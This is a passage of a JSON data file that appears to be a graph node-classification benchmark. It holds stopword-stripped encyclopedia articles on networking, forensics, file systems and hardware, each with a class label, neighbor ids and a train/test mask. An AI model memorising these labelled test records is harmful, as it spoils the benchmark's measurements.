    "text": "Open_Network_Computing_Remote_Procedure_Call:open network computing remote procedure call open network computing onc remote procedure call rpc remote procedure call system onc originally developed sun microsystems 1980s part network file system project sometimes referred sun rpc onc based calling conventions used unix c programming language serializes data using external data representation xdr also found use encode decode data files accessed one platform onc delivers xdr payload using either udp tcp access rpc services machine provided via port mapper listens queries well-known port number 111 udp tcp onc rpc described rfc 1831 published 1995 rfc 5531 published 2009 current version authentication mechanisms used onc rpc described rfc 2695 rfc 2203 rfc 2623 implementations onc rpc exist unix-like systems microsoft supplies implementation windows microsoft windows services unix product addition number third-party implementation onc rpc windows exist including versions c/c++ java .net see external links 2009 sun relicensed onc rpc code standard 3-clause bsd license reconfirmed oracle corporation 2010 following confusion scope relicensing onc considered lean mean limited appeal generalized rpc system wans heterogeneous environments systems dce corba soap generally used wider role",
    "neighbors": [
      9218,
      9731,
      10242,
      1030,
      8211,
      6681,
      6682,
      11292,
      10271,
      6689,
      9251,
      2085,
      6694,
      10789,
      7208,
      5677,
      7214,
      8238,
      562,
      1586,
      9269,
      11321,
      3133,
      5181,
      6723,
      11332,
      8265,
      4687,
      597,
      5206,
      9813,
      11363,
      10341,
      10344,
      3695,
      4723,
      9333,
      2679,
      4729,
      9343,
      5251,
      649,
      4235,
      9868,
      6797,
      3218,
      9365,
      2710,
      11413,
      152,
      3742,
      9380,
      9381,
      3751,
      3752,
      1707,
      172,
      10924,
      2222,
      3247,
      6318,
      6322,
      9909,
      4793,
      7865,
      4797,
      702,
      6338,
      7364,
      10436,
      8905,
      1229,
      5843,
      10461,
      7391,
      3297,
      9441,
      9955,
      10465,
      2797,
      751,
      8432,
      9455,
      8946,
      3322,
      3328,
      9987,
      3847,
      1801,
      1809,
      5397,
      10005,
      5402,
      5405,
      1316,
      9511,
      7984,
      10035,
      8504,
      2362,
      10748,
      829,
      5437,
      2373,
      2887,
      10058,
      2895,
      849,
      6993,
      1876,
      6487,
      2904,
      7003,
      5469,
      5470,
      10589,
      4960,
      5472,
      871,
      11112,
      361,
      11626,
      7022,
      367,
      5492,
      1399,
      891,
      6524,
      11647,
      10115,
      11147,
      6541,
      7570,
      5531,
      7067,
      10144,
      10659,
      933,
      5029,
      2983,
      6577,
      2995,
      2996,
      10171,
      3006,
      7104,
      9665,
      9670,
      1480,
      2509,
      10200,
      8669,
      8670,
      10723,
      10727,
      3564,
      4589,
      7148,
      8179,
      6651,
      3580,
      2045,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 5472,
    "label": 5,
    "text": "Internet_Protocol:internet protocol internet protocol ip principal communications protocol internet protocol suite relaying datagrams across network boundaries routing function enables internetworking essentially establishes internet ip task delivering packets source host destination host solely based ip addresses packet headers purpose ip defines packet structures encapsulate data delivered also defines addressing methods used label datagram source destination information historically ip connectionless datagram service original transmission control program introduced vint cerf bob kahn 1974 complemented connection-oriented service became basis transmission control protocol tcp internet protocol suite therefore often referred tcp/ip first major version ip internet protocol version 4 ipv4 dominant protocol internet successor internet protocol version 6 ipv6 growing adoption reaching almost 25 internet traffic october 2018 internet protocol responsible addressing host interfaces encapsulating data datagrams including fragmentation reassembly routing datagrams source host interface destination host interface across one ip networks purposes internet protocol defines format packets provides addressing system datagram two components header payload ip header includes source ip address destination ip address metadata needed route deliver datagram payload data transported method nesting data payload packet header called encapsulation ip addressing entails assignment ip addresses associated parameters host interfaces address space divided subnetworks involving designation network prefixes ip routing performed hosts well routers whose main function transport packets across network boundaries routers communicate one another via specially designed routing protocols either interior gateway protocols exterior gateway protocols needed topology network may 1974 institute electrical electronics engineers ieee published paper entitled protocol packet network intercommunication paper authors vint cerf bob kahn described internetworking protocol sharing resources using packet switching among network nodes central control component model transmission control program incorporated connection-oriented links datagram services hosts monolithic transmission control program later divided modular architecture consisting transmission control protocol user datagram protocol transport layer internet protocol internet layer model became known department defense dod internet model internet protocol suite informally tcp/ip ip versions 0 3 experimental versions used 1977 1979 following internet experiment note ien documents describe versions internet protocol prior modern version ipv4 dominant internetworking protocol internet layer use today ipv4 number 4 protocol version number carried every ip datagram ipv4 described 1981 version number 5 used internet stream protocol experimental streaming protocol successor ipv4 ipv6 ipv6 result several years experimentation dialog various protocol models proposed tp/ix pip tuba tcp udp bigger addresses prominent difference version 4 size addresses ipv4 uses 32 bits addressing yielding c. 4.3 billion addresses ipv6 uses 128-bit addresses providing ca 340 undecillion addresses although adoption ipv6 slow united states government systems demonstrated basic infrastructure support ipv6 assignment new protocol ipv6 uncertain due diligence revealed ipv6 yet used previously internet protocols assigned numbers according iana ipv7 ipv8 ipv9 ipv9 aka tcp udp big addresses resurfaced mid-2004 purportedly researched adopted china china disowns april 1 1994 ietf published april fools day joke ipv9 design internet protocol suite adheres end-to-end principle concept adapted cyclades project end-to-end principle network infrastructure considered inherently unreliable single network element transmission medium dynamic terms availability links nodes central monitoring performance measurement facility exists tracks maintains state network benefit reducing network complexity intelligence network purposely located end nodes consequence design internet protocol provides best-effort delivery service characterized unreliable network architectural language connectionless protocol contrast connection-oriented communication various error conditions may occur data corruption packet loss duplication routing dynamic meaning every packet treated independently network maintains state based path prior packets different packets may routed destination via different paths resulting out-of-order delivery receiver error conditions network must detected compensated participating end nodes upper layer protocols internet protocol suite responsible resolving reliability issues example host may buffer network data ensure correct ordering data delivered application ipv4 provides safeguards ensure header ip packet error-free routing node discards packets fail header checksum test although internet control message protocol icmp provides notification errors routing node required notify either end node errors ipv6 contrast operates without header checksums since current link layer technology assumed provide sufficient error detection dynamic nature internet diversity components provide guarantee particular path actually capable suitable performing data transmission requested one technical constraints size data packets allowed given link facilities exist examine maximum transmission unit mtu size local link path mtu discovery used entire intended path destination ipv4 internetworking layer ability automatically fragment original datagram smaller units transmission case ip provides re-ordering fragments delivered order ipv6 network perform fragmentation reassembly per end-to-end principle requires end stations higher-layer protocols avoid exceeding network mtu transmission control protocol tcp example protocol adjusts segment size smaller mtu user datagram protocol udp icmp disregard mtu size thereby forcing ip fragment oversized datagrams design phase arpanet early internet security aspects needs public international network could adequately anticipated consequently many internet protocols exhibited vulnerabilities highlighted network attacks later security assessments 2008 thorough security assessment proposed mitigation problems published ietf pursuing studies",
    "neighbors": [
      4609,
      7681,
      10242,
      11267,
      1541,
      1030,
      11269,
      521,
      9233,
      8211,
      5652,
      9238,
      3609,
      6681,
      6682,
      4638,
      10270,
      10271,
      6689,
      9251,
      2085,
      7208,
      1580,
      7214,
      2607,
      8238,
      562,
      1586,
      9779,
      9269,
      1081,
      10809,
      5179,
      11321,
      3133,
      4158,
      5181,
      10302,
      6723,
      6724,
      11332,
      5704,
      6216,
      8265,
      4687,
      6735,
      1618,
      5714,
      10341,
      10853,
      10344,
      3695,
      10864,
      1650,
      4723,
      10354,
      4725,
      6261,
      2679,
      119,
      4729,
      122,
      6267,
      5251,
      9860,
      649,
      7817,
      651,
      9868,
      2701,
      8335,
      3218,
      9365,
      11413,
      152,
      2203,
      3740,
      10908,
      2206,
      3742,
      8864,
      9380,
      9381,
      3751,
      3752,
      7336,
      3755,
      172,
      10924,
      686,
      6318,
      7855,
      2737,
      5809,
      6834,
      7859,
      9393,
      9909,
      7863,
      9399,
      4793,
      7865,
      10417,
      10933,
      4797,
      702,
      2752,
      7361,
      7364,
      11461,
      8391,
      8905,
      11468,
      1229,
      6861,
      1743,
      6351,
      5843,
      1748,
      216,
      3292,
      10461,
      1246,
      7391,
      9438,
      3297,
      1253,
      3813,
      5863,
      4331,
      3820,
      2797,
      751,
      7407,
      8432,
      8946,
      755,
      1268,
      5875,
      7411,
      8437,
      6904,
      1273,
      3322,
      6401,
      2306,
      5890,
      9987,
      3847,
      9992,
      2314,
      2827,
      11532,
      1297,
      2833,
      10005,
      793,
      5402,
      4891,
      5405,
      3872,
      8482,
      10020,
      8487,
      9511,
      4396,
      11566,
      7984,
      10035,
      2356,
      7478,
      3383,
      8504,
      2362,
      10748,
      829,
      5437,
      5439,
      1858,
      835,
      2373,
      2887,
      328,
      841,
      2376,
      6471,
      10055,
      10058,
      2384,
      849,
      6992,
      1876,
      11606,
      2904,
      9048,
      5978,
      7003,
      5469,
      5470,
      5471,
      10589,
      2913,
      9569,
      3428,
      1893,
      3941,
      871,
      5991,
      361,
      2409,
      11112,
      5485,
      367,
      1391,
      6000,
      6512,
      9080,
      891,
      6524,
      6013,
      2431,
      11647,
      1411,
      2947,
      6531,
      10115,
      8073,
      6540,
      6541,
      7570,
      8596,
      1433,
      2970,
      5531,
      2974,
      3486,
      10144,
      929,
      8610,
      10659,
      3492,
      933,
      4005,
      2983,
      9127,
      2476,
      1967,
      6576,
      6577,
      2996,
      5045,
      5559,
      10171,
      3006,
      3007,
      9151,
      449,
      961,
      4546,
      11198,
      9670,
      8138,
      11210,
      2509,
      8654,
      8669,
      8670,
      10210,
      10723,
      3044,
      10727,
      4074,
      3564,
      4589,
      5102,
      11249,
      11250,
      8692,
      10229,
      8694,
      6650,
      6651,
      3580,
      5118,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 5473,
    "label": 4,
    "text": "Jim_Christy:jim christy jim christy born 1951 retired government 2013 director futures exploration fx department defense cyber crime center dc3 fx charge establishing strategic relationships us government private agencies academia christy director defense cyber crime institute 2003–2006 director operations defense computer forensics laboratory 2001-2003 christy chief air force office special investigations afosi computer crime investigations unit 1989-1996 founder world largest digital forensics shop notable involvement high priority government computer security christy joined air force 19 later became computer operator pentagon got job computer crime investigator afosi 1986 1986 christy investigated notorious hanover hackers band west german digital delinquents stole information united states defense department computers sold soviet kgb first hacker case afosi agent 1991 christy founded pentagon first digital forensics lab air force 1998 air force lab became department defense computer forensics laboratory supporting investigative agencies department defense 2016 jim christy asked tom colbert join db cooper cold case team christy put together team go undercover online help colbert team prove real identity db cooper identified history channel documentary aired july 2016",
    "neighbors": [
      10290,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 5474,
    "label": 6,
    "text": "InterMezzo_(file_system):intermezzo file system intermezzo distributed file system written linux kernel distributed gnu general public license included standard linux kernel version 2.4.15 dropped version 2.6 intermezzo designed work top existing journaling file system ext3 jfs reiserfs xfs developed around 1999 intermezzo system consists server holds master copy file system one clients cache file system works either replication mode client maintains duplicate entire file system on-demand mode client requests files needs capturing writes server file system journal streaming client systems replayed intermezzo described high availability file system since client continue operate even connection server lost period disconnection updates logged propagated connection restored conflicts detected handled according conflict resolution policy although best policy likely avoid conflicts typical applications replication mode typical applications on-demand mode distributed file serving file transfer protocol ftp www desktop workstations intermezzo started part coda file system project carnegie mellon university took many design decisions coda share code coda turn branch openafs project designed enhanced scalability performance modularity easy integration existing file systems paper presented open source convention august 1999 peter j. braam michael callahan phil schwan company called stelias computing created web site late 1999 announced beta test version january 2000 although supported standard linux kernel version 2.4 intermezzo removed 2.6 series developers moved new project named lustre company called cluster file systems around 2001 development continued 2003 web site maintained 2008",
    "neighbors": [
      3328,
      2339,
      7364,
      4490,
      5482,
      9836,
      7789,
      7983,
      2194,
      2199,
      2395,
      9335,
      2974
    ],
    "mask": "None"
  },
  {
    "node_id": 5475,
    "label": 4,
    "text": "Mobile_device_forensics:mobile device forensics mobile device forensics branch digital forensics relating recovery digital evidence data mobile device forensically sound conditions phrase mobile device usually refers mobile phones however also relate digital device internal memory communication ability including pda devices gps devices tablet computers use mobile phones/devices crime widely recognised years forensic study mobile devices relatively new field dating early 2000s late 1990s proliferation phones particularly smartphones digital devices consumer market caused demand forensic examination devices could met existing computer forensics techniques mobile devices used save several types personal information contacts photos calendars notes sms mms messages smartphones may additionally contain video email web browsing information location information social networking messages contacts growing need mobile forensics due several reasons prominent reasons mobile device forensics particularly challenging number levels evidential technical challenges exist example cell site analysis following use mobile phone usage coverage exact science consequently whilst possible determine roughly cell site zone call made received yet possible say degree certainty mobile phone call emanated specific location e.g residential address result challenges wide variety tools exist extract evidence mobile devices one tool method acquire evidence devices therefore recommended forensic examiners especially wishing qualify expert witnesses court undergo extensive training order understand tool method acquires evidence maintains standards forensic soundness meets legal requirements daubert standard frye standard field study forensic examination mobile devices dates late 1990s early 2000s role mobile phones crime long recognized law enforcement increased availability devices consumer market wider array communication platforms support e.g email web browsing demand forensic examination grew early efforts examine mobile devices used similar techniques first computer forensics investigations analysing phone contents directly via screen photographing important content however proved time-consuming process number mobile devices began increase investigators called efficient means extracting data enterprising mobile forensic examiners sometimes used cell phone pda synchronization software back device data forensic computer imaging sometimes simply performed computer forensics hard drive suspect computer data synchronized however type software could write phone well reading could retrieve deleted data forensic examiners found could retrieve even deleted data using flasher twister boxes tools developed oems flash phone memory debugging updating however flasher boxes invasive change data complicated use developed forensic tools perform neither hash verifications cases audit trails physical forensic examinations therefore better alternatives remained necessary meet demands commercial tools appeared allowed examiners recover phone memory minimal disruption analyse separately time commercial techniques developed recovery deleted data proprietary mobile devices become possible specialist tools moreover commercial tools even automated much extraction process rendering possible even minimally trained first responders—who currently much likely encounter suspects mobile devices possession compared computers—to perform basic extractions triage data preview purposes mobile device forensics best known application law enforcement investigations also useful military intelligence corporate investigations private investigations criminal civil defense electronic discovery mobile device technology advances amount types data found mobile device constantly increasing evidence potentially recovered mobile phone may come several different sources including handset memory sim card attached memory cards sd cards traditionally mobile phone forensics associated recovering sms mms messaging well call logs contact lists phone imei/esn information however newer generations smartphones also include wider varieties information web browsing wireless network settings geolocation information including geotags contained within image metadata e-mail forms rich internet media including important data—such social networking service posts contacts—now retained smartphone 'apps nowadays mostly flash memory consisting nand types used mobile devices external memory devices sim cards sd cards commonly found within gps devices well mobile phones mmc cards cf cards memory stick although technically part mobile device forensics call detail records occasionally text messages wireless carriers often serve back evidence obtained mobile phone seized useful call history and/or text messages deleted phone location-based services turned call detail records cell site tower dumps show phone owner location whether stationary moving i.e. whether phone signal bounced side single tower different sides multiple towers along particular path travel carrier data device data together used corroborate information sources instance video surveillance footage eyewitness accounts determine general location non-geotagged image video taken european union requires member countries retain certain telecommunications data use investigations includes data calls made retrieved location mobile phone determined geographical data must also retained united states however requirement exists standards govern long carriers retain data even must retain example text messages may retained week two call logs may retained anywhere weeks several months reduce risk evidence lost law enforcement agents must submit preservation letter carrier must back search warrant forensics process mobile devices broadly matches branches digital forensics however particular concerns apply generally process broken three main categories seizure acquisition examination/analysis aspects computer forensic process intake validation documentation/reporting archiving still apply seizing mobile devices covered legal considerations digital media mobiles often recovered switched aim seizure preserve evidence device often transported state avoid shutdown would change files addition investigator first responder would risk user lock activation however leaving phone carries another risk device still make network/cellular connection may bring new data overwriting evidence prevent connection mobile devices often transported examined within faraday cage bag even two disadvantages method first renders device unusable touch screen keypad used second device search network connection drain battery quickly devices batteries often recharged investigator risks phone user lock activated therefore network isolation advisable either placing device airplane mode cloning sim card technique also useful device missing sim card entirely second step forensic process acquisition case usually referring retrieval material device compared bit-copy imaging used computer forensics due proprietary nature mobiles often possible acquire data powered mobile device acquisition performed live advanced smartphones using advanced memory management connecting recharger putting faraday cage may good practice mobile device would recognize network disconnection therefore would change status information trigger memory manager write data acquisition tools mobile devices commercial nature consist hardware software component often automated increasing number mobile devices use high-level file systems similar file systems computers methods tools taken hard disk forensics need slight changes fat file system generally used nand memory difference block size used larger 512 bytes hard disks depends used memory type e.g. type 64 128 256 nand memory 16 128 256 512 kilobyte different software tools extract data memory image one could use specialized automated forensic software products generic file viewers hex editor search characteristics file headers advantage hex editor deeper insight memory management working hex editor means lot handwork file system well file header knowledge contrast specialized forensic software simplifies search extracts data may find everything accessdata sleuthkit encase mention forensic software products analyze memory images since tool extracts possible information advisable use two tools examination currently february 2010 software solution get evidences flash memories mobile device data extraction classified according continuum along methods become technical “ forensically sound ” tools become expensive analysis takes longer examiners need training methods even become invasive examiner utilizes user interface investigate content phone memory therefore device used normal examiner taking pictures screen contents method advantage operating system makes unnecessary use specialized tools equipment transform raw data human interpretable information practice method applied cell phones pdas navigation systems disadvantages data visible operating system recovered data available form pictures process time-consuming logical acquisition implies bit-by-bit copy logical storage objects e.g. directories files reside logical storage e.g. file system partition logical acquisition advantage system data structures easier tool extract organize logical extraction acquires information device using original equipment manufacturer application programming interface synchronizing phone contents personal computer logical extraction generally easier work produce large binary blob however skilled forensic examiner able extract far information physical extraction logical extraction usually produce deleted information due normally removed phone file system however cases—particularly platforms built sqlite ios android—the phone may keep database file information overwrite information simply marks deleted available later overwriting cases device allows file system access synchronization interface possible recover deleted information file system extraction useful understanding file structure web browsing history app usage well providing examiner ability perform analysis traditional computer forensic tools physical acquisition implies bit-for-bit copy entire physical store e.g flash memory therefore method similar examination personal computer physical acquisition advantage allowing deleted files data remnants examined physical extraction acquires information device direct access flash memories generally harder achieve device original equipment manufacturer needs secure arbitrary reading memory therefore device may locked certain operator get around security mobile forensics tool vendors often develop boot loaders enabling forensic tool access memory often also bypass user passcodes pattern locks generally physical extraction split two steps dumping phase decoding phase brute force acquisition performed 3rd party passcode brute force tools send series passcodes passwords mobile device time consuming method effective nonetheless technique uses trial error attempt create correct combination password pin authenticate access mobile device despite process taking extensive amount time still one best methods employ forensic professional unable obtain passcode current available software hardware become quite easy break encryption mobile devices password file obtain passcode two manufacturers become public since release iphone5 cellebrite grayshift manufacturers intended law enforcement agencies police departments cellbrite ufed ultimate unit costs 40,000 us dollars grashifts system costs 15,000 brute forcing tools connected device physically send codes ios devices starting 0000 9999 sequence correct code successfully entered code entry successful full access device given data extraction commence early investigations consisted live manual analysis mobile devices examiners photographing writing useful material use evidence without forensic photography equipment fernico zrt edec eclipse project-a-phone disadvantage risking modification device content well leaving many parts proprietary operating system inaccessible recent years number hardware/software tools emerged recover logical physical evidence mobile devices tools consist hardware software portions hardware includes number cables connect mobile device acquisition machine software exists extract evidence occasionally even analyse recently mobile device forensic tools developed field response military units demand fast accurate anti-terrorism intelligence law enforcement demand forensic previewing capabilities crime scene search warrant execution exigent circumstances mobile forensic tools often ruggedized harsh environments e.g battlefield rough treatment e.g dropped submerged water generally impossible one tool capture evidence mobile devices mobile forensic professionals recommend examiners establish entire toolkits consisting mix commercial open source broad support narrow support forensic tools together accessories battery chargers faraday bags signal disruption equipment forth current tools include cellebrite ufed oxygen forensic detective susteen secure view micro systemation xry tools additionally developed address increasing criminal usage phones manufactured chinese chipsets include mediatek mtk spreadtrum mstar tools include cellebrite chinex xry pinpoint open source mobile forensics tools platform-specific geared toward smartphone analysis though originally designed forensics tool bitpim widely used cdma phones well lg vx4400/vx6000 many sanyo sprint cell phones commonly referred chip-off technique within industry last intrusive method get memory image desolder non-volatile memory chip connect memory chip reader method contains potential danger total data destruction possible destroy chip content heat required desoldering invention bga technology possible attach probes pins memory chip recover memory probes bga technique bonds chips directly onto pcb molten solder balls longer possible attach probes desoldering chips done carefully slowly heat destroy chip data chip desoldered pcb baked oven eliminate remaining water prevents so-called popcorn effect remaining water would blow chip package desoldering mainly three methods melt solder hot air infrared light steam-phasing infrared light technology works focused infrared light beam onto specific integrated circuit used small chips hot air steam methods focus much infrared technique desoldering chip re-balling process cleans chip adds new tin balls chip re-balling done two different ways third method makes entire re-balling process unnecessary chip connected adapter y-shaped springs spring-loaded pogo pins y-shaped springs need ball onto pin establish electric connection pogo pins used directly pads chip without balls advantage forensic desoldering device need functional copy without changes original data made disadvantage re-balling devices expensive process costly risks total data loss hence forensic desoldering done experienced laboratories existing standardized interfaces reading data built several mobile devices e.g. get position data gps equipment nmea get deceleration information airbag units mobile devices provide standardized interface exist standard interface mobile devices manufacturers one problem common miniaturizing device parts opens question automatically test functionality quality soldered integrated components problem industry group joint test action group jtag developed test technology called boundary scan despite standardization four tasks jtag device interface used recover memory find correct bits boundary scan register one must know processor memory circuits used connected system bus accessible outside one must find test points jtag interface printed circuit board determine test point used signal jtag port always soldered connectors sometimes necessary open device re-solder access port protocol reading memory must known finally correct voltage must determined prevent damage circuit boundary scan produces complete forensic image volatile non-volatile memory risk data change minimized memory chip n't desoldered generating image slow mobile devices jtag enabled also difficult find test access port mobile devices provide possibility run boot cd connecting network share another device clean tools therefore system commands could way save volatile memory mobile device risk modified system commands must estimated volatile memory really important similar problem arises network connection available secondary memory connected mobile device volatile memory image must saved internal non-volatile memory user data stored likely deleted important data lost system commands cheapest method imply risks data loss every command usage options output must documented commands old modem commands e.g. hayes command set motorola phone commands therefore used device modem support using commands one obtain information operating system deleted data extracted external memory usb flash drive appropriate software e.g. unix command dd needed make bit-level copy furthermore usb flash drives memory protection need special hardware connected computer many usb drives memory cards write-lock switch used prevent data changes making copy usb drive protection switch blocker used mount drive read-only mode exceptional case memory chip desoldered sim memory cards need card reader make copy sim card soundly analyzed possible recover deleted data like contacts text messages android operating system includes dd command blog post android forensic techniques method live image android device using dd command demonstrated flasher tool programming hardware and/or software used program flash device memory e.g. eeprom flash memory tools mainly originate manufacturer service centers debugging repair upgrade services overwrite non-volatile memory depending manufacturer device also read memory make copy originally intended backup memory protected reading e.g. software command destruction fuses read circuit note would prevent writing using memory internally cpu flasher tools easy connect use change data dangerous options make complete copy general exists standard constitutes supported device specific product led situation different vendors define supported device differently situation makes much harder compare products based vendor provided lists supported devices instance device logical extraction using one product produces list calls made device may listed supported vendor another vendor produce much information furthermore different products extract different amounts information different devices leads complex landscape trying overview products general leads situation testing product extensively purchase strongly recommended quite common use least two products complement mobile phone technology evolving rapid pace digital forensics relating mobile devices seems stand still evolving slowly mobile phone forensics catch release cycles mobile phones comprehensive depth framework evaluating mobile forensic toolkits developed data appropriate tools techniques type phone made available timely manner anti-computer forensics difficult small size devices user restricted data accessibility nevertheless developments secure memory hardware security circuits cpu memory chip memory chip read even desoldering",
    "neighbors": [
      2437,
      7560,
      5010,
      9235,
      4500,
      8469,
      3099,
      7968,
      6177,
      9762,
      5284,
      5546,
      8237,
      11182,
      7983,
      10290,
      4789,
      1083,
      8635,
      2494,
      830,
      4041,
      7369,
      6475,
      10189,
      4049,
      2901,
      1121,
      4834,
      7525,
      9319,
      1776,
      7160,
      11642
    ],
    "mask": "Test"
  },
  {
    "node_id": 5476,
    "label": 7,
    "text": "Federated_content:federated content federated content digital media content designed self-managing support reporting rights management peer-to-peer p2p network ex audio stored digital rights management drm file format",
    "neighbors": [
      8640
    ],
    "mask": "Test"
  },
  {
    "node_id": 5477,
    "label": 9,
    "text": "Robot_Battle:robot battle robot battle programming game microsoft windows players design code adaptable battling robots robot battle takes strategy rather reflexes accuracy timing succeed differentiates one robot next programming player responsible game inspired similar game robotwar robot battle created brad schick 1994 released public free year reached version 1.2 went many versions seeming peak 1.3 1995 1997 david finch released 1.33 community time held together robot battle mailing list rbml closed february 2004 robot battle registry internet forum opened tournaments held new players could helped complicated coding questions could posed answered early 2001 brad began work robot battle 1.4 promised massive upgrade rbml alive ideas suggestions offers help resulted robot battle new players know including new features mid-2001 small company called garagegames showed interest robot battle brad agreed sell game soon first official 1.4 release december 2002 work began robot battle registry forum way storing robots people download well way organise advertise tournaments registry opened may 2003 robot battle steadily growing user base communications registry forums irc first registry available people purchased game since opened anybody robot battle distributed mpl open-source license allowing anybody read code help design robots programs interact game somehow robot battle full version published free november 23 2004 robots robot battle three separate parts body contains tracks square size 33x33 rotates speed 5 degrees per turn gun ability shoot energy missiles damage robots destroy missiles mines cookies collision rotate 10 degrees per turn radar ability scan cookies mines robots walls rotate 15 degrees per turn robots programmed robot scripting language rsl created text editors notepad robots usually worked distributed .prg format coders choose scramble robots distribute .dst files scrambling software created brad robot battle 1.3 later edited joseph fowler aka sorcerer mark duller give two separate programs compatible robot battle 1.4 rsl said resemble many programming languages including basic c javascript robot one many sections separated section names curly brackets init required section sections defined event priority core section need priority contains details robot n't anything else ascan used usually lowest priority least important takes place whenever robot moving events take place object detected radar collided body parts robot controlled commands easiest way make robot look ones come free game combo smart corner events fire rammer shell side liner target walls ii zag robots demonstrate uses simple commands well advanced tactics use radio differences creating robot turned",
    "neighbors": [
      6797,
      5251,
      2045,
      3462
    ],
    "mask": "None"
  },
  {
    "node_id": 5478,
    "label": 0,
    "text": "Eckhard_Bick:eckhard bick eckhard bick born 16 july 1958 german-born esperantist studied medicine bonn works researcher computational linguistics active esperanto youth group bonn germana esperanto-junularo nationwide esperanto youth federation since marriage danish woman family live denmark bick obtained degrees english 1983 medicine 1984 pedagogics 1985 bonn university m.a north germanic languages portuguese institute linguistics aarhus university 1994-99 bick dissertation project lexicography described palavras so-called progressive level parser dependency grammar portuguese language based constraint grammar paradigm supported corpus-based research thesis analyzes portuguese lexical morphology morphosyntactics syntax semantics semantic parsing well computer-mediated learning translation book illustrator uta hasekamp co-author tesi la testudo german-language esperanto primer translated books songs plays esperanto published various esperanto games also author extensive esperanto-danish dictionary 35,000 headwords 1990 342 pp. extent comparable classic store esperanto-dansk ordbog great esperanto-danish dictionary lorenz friis peter frey three editions published 1938 1953 1969 31,000 headwords bick dictionary up-to-date today leading dictionary type since 1996 bick led visual interactive syntax learning project institute language communication university southern denmark engaged design programming grammatical tools internet also builds constraint grammars phrase structure grammars visl languages lexical resources annotated corpora known treebanks corpora include grammatical analysis word visl team generated manually revised language data 27 languages cooperation grammarsoft commercializing technology developed rule-based taggers parsers nine languages including english portuguese esperanto scandinavian languages linguist bick researches natural language parsing corpus linguistics though specializes portuguese danish also developed constraint grammars english spanish french language esperanto",
    "neighbors": [
      1890,
      4070,
      7599,
      10610,
      5399
    ],
    "mask": "None"
  },
  {
    "node_id": 5479,
    "label": 4,
    "text": "Xetron:xetron xetron corporation northrop grumman corporation subsidiary government contractor developing software communications systems xetron used produce popular xetron spl-60 low noise audio amplifier tunable comb notch filter 9 july 1992 first iboc transmission sent xetron offices cincinnati since company contracted usadr work project 2000 company awarded 2.1 million contract viasat develop mids-lvt radio system 2011 revealed company worked hbgary palantir attribution deanonymizing internet activists anonymous according documents leaked edward snowden sharing hacking techniques intelligence agencies since least 2010 year developed malicious windows software named orca preventing malware detection antivirus software wikileaks vault 7 disclosures 2017 revealed xetron developed tools allowing unauthorized access cisco routers cia well cinnamon − implant cisco devices according documents also developed software control compromised computers via command servers agency march 2017 company name shows nearly 400 leak documents intercept revealed 2017 employees xetron suddenly subjected polygraph unclear whether due active investigation source leaks simply stepped-up security requirement",
    "neighbors": [
      8320,
      2213,
      3495,
      297,
      7893
    ],
    "mask": "Test"
  },
  {
    "node_id": 5480,
    "label": 2,
    "text": "Communications_Controller_for_Linux:communications controller linux communications controller linux communications controller linux system z ccl ibm software product announced 2005 runs linux system z emulates ibm 37xx communications controller ccl runs unmodified ibm network control program ncp allow consolidation sna network infrastructure ip according ibm sna traffic enters leaves ccl sna network flows osa adapter however wide area network infrastructure need sna consolidate sna traffic use tunneling data link switching dlsw encapsulate sna communication ip network ccl supports ethernet token ring local area network lan connectivity directly connectivity dlsw router x.25 requires ibm npsi software plus third party package ccl support bisync start-stop according ibm figures ccl offers performance average 3745",
    "neighbors": [
      3323,
      863
    ],
    "mask": "None"
  },
  {
    "node_id": 5481,
    "label": 3,
    "text": "ThinkPad_UltraBay:thinkpad ultrabay ultrabay originally ibm name swappable drive bay thinkpad range laptop computers thinkpad product line sold lenovo concept name stayed furthermore used lenovo ideapad series laptops introduced thinkpad 750 series 1995 technology gone redesigns almost every new generation thinkpad may lead confusion following table gives overview different ultrabay types models occurred drives available note optical drive bay g series r40e series thinkpads ultrabay drives fixed removable however mechanically ultrabay 2000-device without surrounding caddy media side different ultrabays relate form factor drives accept machines accept ultrabay devices 12.5 mm thick whereas others limited devices 9.5 mm thick ideapad y400 y500 laptops ultrabay slot swapped another hard drive another fan another nvidia gt650m gt750m gpu work sli system primary video card increased graphics performance existing orders ultrabay y500 dvd burner built optical drive cancelled early june 2013 starting 2014 lenovo changed design thinkpad bay adapter dropped ultrabay terminology use remained thinkpad w540 product option removable serial ata sata caddy accessory screw driver allowed optical drive replaced second 2.5 inch sata storage device battery expansion caddy bay longer offered earlier hot-swap functionality essentially rendered difficult impossible",
    "neighbors": [
      4259,
      5606,
      3304,
      271,
      2165,
      3323
    ],
    "mask": "Train"
  },
  {
    "node_id": 5482,
    "label": 4,
    "text": "Rsync:rsync rsync utility efficiently transferring synchronizing files computer external hard drive across networked computers comparing modification times sizes files commonly found unix-like operating systems rsync algorithm type delta encoding used minimizing network usage zlib may used additional data compression ssh stunnel used security rsync typically used synchronizing files directories two different systems example command codice_1 run rsync use ssh connect codice_2 codice_3 connected invoke remote host rsync two programs determine parts local file need transferred remote file matches local one rsync also operate daemon mode serving receiving files native rsync protocol using rsync // syntax licensed gnu general public license andrew tridgell paul mackerras wrote original rsync first announced 19 june 1996 tridgell discusses design implementation performance rsync chapters 3 5 ph.d. thesis 1999 currently maintained wayne davison flexibility speed scriptability codice_4 become standard linux utility included popular linux distributions ported windows via cygwin grsync sfu freebsd netbsd openbsd macos similar codice_5 codice_6 codice_7 codice_4 requires specification source destination local either may remote generic syntax src file directory list multiple files directories copy dest file directory copy square brackets indicate optional parameters codice_4 synchronize unix clients central unix server using codice_4/codice_11 standard unix accounts used desktop environments example efficiently synchronize files backup copy external hard drive scheduling utility codice_12 carry tasks automated encrypted codice_4-based mirroring multiple hosts central server command line mirror freebsd might look like apache http server supports rsync updating mirrors preferred simplest way mirror putty website current directory use rsync way mimic capabilities time machine macos see also tym make full backup system root directory rsync process operates communicating another rsync process sender receiver startup rsync client connects peer process transfer local file systems mounted host peer created fork setting suitable pipes connection remote host involved rsync starts process handle connection typically secure shell upon connection command issued start rsync process remote host uses connection thus established alternative remote host runs rsync daemon rsync clients connect opening socket tcp port 873 possibly using proxy rsync numerous command line options configuration files specify alternative shells options commands possibly full path port numbers besides using remote shells tunnelling used remote ports appear local server rsync daemon runs possibilities allow adjusting security levels state art naive rsync daemon enough local network default rsync determines files differ sending receiving systems checking modification time size file time size different systems transfers file sending receiving system requires reading file directory information quick miss unusual modifications change neither rsync performs slower comprehensive check invoked codice_14 forces full checksum comparison every file present systems barring rare 